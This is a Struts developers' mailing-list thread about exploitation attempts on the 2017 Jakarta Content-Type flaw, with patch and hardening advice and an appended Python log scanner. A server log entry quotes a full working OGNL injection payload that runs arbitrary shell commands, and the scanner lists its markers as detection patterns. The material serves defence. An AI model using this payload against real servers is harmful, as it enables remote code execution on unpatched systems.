Looking at my logs I can see some activity: GRRR :

179.253.10.27 - - [24/Mar/2017:08:39:13 +0000] "GET /notFound.action HTTP/1.1" 404 2258 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"

2017-03-24 08:39:13,649 WARN org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest JakartaMultiPartRequest:parse - Request exceeded size limit! org.apache.commons.fileupload.FileUploadBase$InvalidContentTypeException: the request doesn't contain a multipart/form-data or multipart/mixed stream, content type header is %{(#nike='multipart/form-data' ).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_ memberAccess?(#_memberAccess=#dm):((#container=#context[' com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container. getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil. getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()). (#context.setMemberAccess(#dm)))).(#cmd='nMaskCustomMuttMoloz').(# iswin=(@java.lang.System@getProperty('os.name'). toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/ c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(# cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@ org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@ org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros. flush())}

On 16 March 2017 at 12:45, Martin Gainty <mgai...@hotmail.com> wrote:

> ________________________________
> From: Greg Huber <gregh3...@gmail.com>
> Sent: Thursday, March 16, 2017 5:19 AM
> To: Struts Developers List
> Subject: Re: S2 makes Hacker News :/
>
> Just because you are using s2, does not necessarily mean you are affected,
> all I get is a response :
>
> HTTP/1.1 404
> Content-Length: 0
> Date: Thu, 16 Mar 2017 09:02:54 GMT
> Connection: close
>
> Looking at my logs this fishing is going on all the time.
>
> MG>from what i read injections only happen with Content-Type injection
>
> MG>then again patches Struts 2.3.32 or 2.5.10.1 has been available for
> some time
>
> MG>Johannes suggests implementing 'snort' to detect injection
> vulnerability reference link at sans.edu below:
> https://isc.sans.edu/forums/diary/Critical+Apache+Struts+2+Vulnerability+Patch+Now/22169/
>
> MG>Thanks Lukasz!
>
> Thanks also Lukasz for the quick fix.
>
> Cheers Greg
>
> On 14 March 2017 at 18:17, Lukasz Lenart <lukaszlen...@apache.org> wrote:
>
> > 2017-03-14 15:57 GMT+01:00 Doug Erickson <erick...@part.net>:
> > > What is the proper server setup to prevent this?
> >
> > Upgrade to the latest Struts version ... and run server on a dedicated
> > account, block access to the world (server should be only allowed to
> > connect to localhost) and few other things
> >
> >
> > Regards
> > --
> > Łukasz
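
An added example, not part of the thread: one way to pull these probes out of the Struts application log and tie each one back to its access-log request. The sample lines are constructed, the function names are hypothetical, and both logs are assumed to be written in UTC.

```python
import re
from datetime import datetime, timedelta, timezone

# Constructed sample lines in the two formats quoted above (documentation IPs,
# header value cut down to a fragment that executes nothing).
ACCESS_LOG = """\
203.0.113.7 - - [24/Mar/2017:08:39:13 +0000] "GET /notFound.action HTTP/1.1" 404 2258 "-" "Mozilla/5.0"
203.0.113.9 - - [24/Mar/2017:08:41:02 +0000] "POST /upload.action HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""
_PREFIX = ("WARN org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest "
           "JakartaMultiPartRequest:parse - Request exceeded size limit! ... "
           "content type header is ")
APP_LOG = (
    "2017-03-24 08:39:13,649 " + _PREFIX
    + "%{(#x='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)}\n"
    + "2017-03-24 08:41:02,100 " + _PREFIX + "text/plain\n"
)

APP_RE = re.compile(r"^(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d),\d+ WARN "
                    r"\S*JakartaMultiPartRequest .*?content type header is (.*)$")
ACCESS_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) ')
# Tokens that never occur in a legitimate Content-Type value.
OGNL_MARKERS = ("%{", "${", "@ognl.", "#_memberAccess", "#context", "ProcessBuilder")

def is_ognl(content_type):
    # Drop whitespace first: wrapped or re-flowed logs split tokens ("#_ memberAccess").
    compact = re.sub(r"\s+", "", content_type)
    return any(marker in compact for marker in OGNL_MARKERS)

def find_probes(app_log, access_log, window=timedelta(seconds=1)):
    requests = []
    for line in access_log.splitlines():
        m = ACCESS_RE.match(line)
        if m:
            ts = datetime.strptime(m.group(2), "%d/%b/%Y:%H:%M:%S %z")
            ts = ts.astimezone(timezone.utc).replace(tzinfo=None)
            requests.append((ts, m.group(1), m.group(3), int(m.group(4))))
    hits = []
    for line in app_log.splitlines():
        m = APP_RE.match(line)
        if not m or not is_ognl(m.group(2)):
            continue
        ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
        sources = [(ip, req, status) for t, ip, req, status in requests
                   if abs(t - ts) <= window]
        hits.append({"time": ts, "sources": sources})
    return hits
```

On a busy server the one-second window can return several candidate requests per hit, so treat `sources` as a shortlist to review rather than a definitive attribution.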